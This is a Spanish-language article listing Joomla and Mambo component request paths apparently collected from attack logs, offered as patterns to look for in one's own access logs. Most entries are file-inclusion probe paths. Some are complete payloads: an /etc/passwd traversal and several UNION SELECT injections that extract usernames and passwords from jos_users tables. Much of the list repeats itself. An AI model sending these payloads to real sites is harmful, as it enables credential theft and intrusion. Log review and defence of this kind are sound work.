 

Listado de componentes con posibles vulnerabilidades


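Este artículo es un recopilatorio de los componentes de Joomla en los que hemos ido encontrando posibles vulnerabilidades. La mayoría de ellos se han sacado de los logs de Mirulu, así que las entradas reproducen la ruta y el parámetro de la petición registrada. Que una ruta aparezca en un log indica un intento, no que el componente instalado sea vulnerable; el listado sirve sobre todo para buscar estos mismos patrones en los logs de acceso propios y revisar si el componente correspondiente está instalado y actualizado.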

  1. /components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
  2. /templates/be2004-2/index.php?mosConfig_absolute_path=
  3. /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
  4. /libraries/pcl/pcltar.php?g_pcltar_lib_dir=
  5. /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=
  6. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  7. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
  8. /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
  9. /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
  10. /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
  11. /components/com_mambowiki/MamboLogin.php?IP=
  12. /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
  13. /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
  14. /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
  15. /components/com_cpg/cpg.php?mosConfig_absolute_path=
  16. /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
  17. /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
  18. /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
  19. /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
  20. /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
  21. /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
  22. /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
  23. /components/com_securityimages/configinsert.php?mosConfig_absolute_path=
  24. /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
  25. /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
  26. /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
  27. /components/com_moodle/moodle.php?mosConfig_absolute_path=
  28. /components/com_mospray/scripts/admin.php?basedir=
  29. /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
  30. /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
  31. /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
  32. /components/com_hashcash/server.php?mosConfig_absolute_path=
  33. /components/com_minibb.php?absolute_path=
  34. /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
  35. /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
  36. /components/calendar/com_calendar.php?absolute_path=
  37. /modules/calendar/mod_calendar.php?absolute_path=
  38. /components/com_calendar.php?absolute_path=
  39. /modules/mod_calendar.php?absolute_path=
  40. /modules/mod_weather.php?absolute_path=
  41. /components/minibb/index.php?absolute_path=
  42. /components/com_performs/performs.php?mosConfig_absolute_path=
  43. /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
  44. /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
  45. /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
  46. /components/com_smf/smf.php?mosConfig_absolute_path=
  47. /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
  48. /components/com_forum/download.php?phpbb_root_path=
  49. /components/com_simpleboard/image_upload.php?sbp=
  50. /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
  51. /includes/functions_cms.php?phpbb_root_path=
  52. /includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
  53. /includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
  54. /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
  55. /modules/mod_as_category.php?mosConfig_absolute_path=
  56. /includes/move.php?GlobalSettings[templatesDirectory]=
  57. /mod_cbsms_messages.php?mosConfig_absolute_path=
  58. /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
  59. /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
  60. /component/com_events/includes/comutils.php?mosConfig_absolute_path=
  61. /administrator/components/com_expose/uploadimg.php
  62. /modules/mod_header_image.php?mosConfig_absolute_path=
  63. /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,5, username,char(32,112,97,115,115,119,111,114,100,5,password),5,0,0%20from%20jos_users/*
  64. /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
  65. /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
  66. /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
  67. /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
  68. /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
  69. /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
  70. /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
  71. /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
  72. /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
  73. /components/com_jcs/jcs.function.php?mosConfig_absolute_path=
  74. /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
  75. /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
  76. /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
  77. /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
  78. /administrator/components/com_color/admin.color.php?mosConfig_live_site= 
  79. /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=
  80. /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=
  81. /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=
  82. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  83. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
  84. /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
  85. /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
  86. /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
  87. /components/com_mambowiki/MamboLogin.php?IP=
  88. /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
  89. /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
  90. /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
  91. /components/com_cpg/cpg.php?mosConfig_absolute_path=
  92. /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
  93. /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
  94. /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
  95. /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
  96. /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
  97. /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
  98. /components/com_securityimages/configinsert.php?mosConfig_absolute_path=
  99. /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
  100. /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
  101. /components/com_moodle/moodle.php?mosConfig_absolute_path=
  102. /components/com_mospray/scripts/admin.php?basedir=
  103. /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
  104. /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
  105. /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
  106. /components/com_hashcash/server.php?mosConfig_absolute_path=
  107. /components/com_minibb.php?absolute_path=
  108. /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
  109. /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
  110. /components/calendar/com_calendar.php?absolute_path=
  111. /modules/calendar/mod_calendar.php?absolute_path=
  112. /components/com_calendar.php?absolute_path=
  113. /modules/mod_calendar.php?absolute_path=
  114. /modules/mod_weather.php?absolute_path=
  115. /components/minibb/index.php?absolute_path=
  116. /components/com_performs/performs.php?mosConfig_absolute_path=
  117. /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
  118. /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
  119. /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
  120. /components/com_smf/smf.php?mosConfig_absolute_path=
  121. /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
  122. /components/com_forum/download.php?phpbb_root_path=
  123. /components/com_simpleboard/image_upload.php?sbp=
  124. /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
  125. /includes/functions_cms.php?phpbb_root_path=
  126. /includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
  127. /includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
  128. /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
  129. /modules/mod_as_category.php?mosConfig_absolute_path=
  130. /includes/move.php?GlobalSettings[templatesDirectory]=
  131. /mod_cbsms_messages.php?mosConfig_absolute_path=
  132. /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
  133. /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
  134. /component/com_events/includes/comutils.php?mosConfig_absolute_path=
  135. /administrator/components/com_expose/uploadimg.php  
  136. /modules/mod_header_image.php?mosConfig_absolute_path=
  137. /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58), username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*
  138. /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
  139. /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
  140. /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
  141. /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
  142. /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
  143. /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
  144. /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
  145. /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
  146. /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
  147. /components/com_jcs/jcs.function.php?mosConfig_absolute_path=
  148. /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
  149. /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
  150. /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
  151. /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
  152. /administrator/components/com_color/admin.color.php?mosConfig_live_site=
  153. /templates/ytw_9kred/index.php
  154. /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=
  155. /index.php?option=com_yanc&act=subscriber&task=
  156. /index.php?option=com_remository&Itemid=0&func=select&id=0
  157. /index.php?option=com_yanc&act=archive&task=forward&cid=7&Itemid=99999999&no_html=
  158. /index.php?option=com_gallery=&sectionid=&id=&mosConfig_absolute_path=
  159. /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=
  160. /index.php?option=com_jpad&task=edit&Itemid=39&cid=
  161. /index.php?option=com_yanc&Itemid=9999999& listid=99 99999/**/union/**/select/**/name,password/**/from/**/mos_users/*
  162. /index.php?option=com_gmaps&task=viewmap&Itemid=57& mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
  163. /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/*
  164. /index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=
  165. /index.php?option=com_poll&task=results&id=14&mosConfig_absolute_path=
  166. /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=
  167. /index.php?option=com_content&task=view&id=26&Itemid=2/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path= 
  168. /index.php?option=com_content&task=view&id=26&Itemid=2//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
  169. /index.php?option=com_content&task=view&id=26&Itemid=2//components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
  170. /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=
  171. /index.php?option=com_content&task=view&id=26&Itemid=2/components/com_mp3_allopass/allopass.php?mosConfig_live_site=
  172. /index.php?option=com_content&task=view&id=26&Itemid=2/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= 
  173. /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path= 
  174. /index.php?option=com_content&task=view&id=26&Itemid=2//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
  175. /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=
  176. /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path= 
  177. /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=
  178. /components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=
  179. /components/com_facileforms/facileforms.frame.php?ff_compath= 
  180. /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid= S@BUN&cat_id=-9999999/**/union/**/select/**/ 000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*
  181. /index.php?option=com_panoramic&Itemid=&mosConfig_absolute_path=
  182. /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
  183. /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=
  184. /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_absolute_path=
  185. /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= 
  186. /index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--